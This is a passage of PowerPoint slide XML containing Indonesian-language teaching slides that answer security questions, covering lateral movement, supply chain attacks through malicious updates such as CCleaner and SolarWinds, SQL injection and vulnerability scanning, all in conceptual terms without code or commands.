              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>lateral movement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Pola </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Advanced Persistent Threat (APT)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> punya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergerak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> malicious updates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>memperkenalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> malware?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>supply chain attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> update yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Update software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh user dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menempelkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> update (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memalsukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server update), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diinstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>CCleaner (2017)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>SolarWinds Orion (2020)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, di mana update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> backdoor yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ribuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> korban.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Malicious update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lewat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="2" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Repo update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="2" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Server update di-hijack (DNS poisoning, MITM).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="2" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Insider attacker di vendor software.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>3. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> pada database via web application</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>SQL Injection (SQLi)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>divalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyisipkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> query yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dampaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/hapus data, bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>remote code execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>SQLi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>OWASP Top 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web.</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185</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378651676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Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
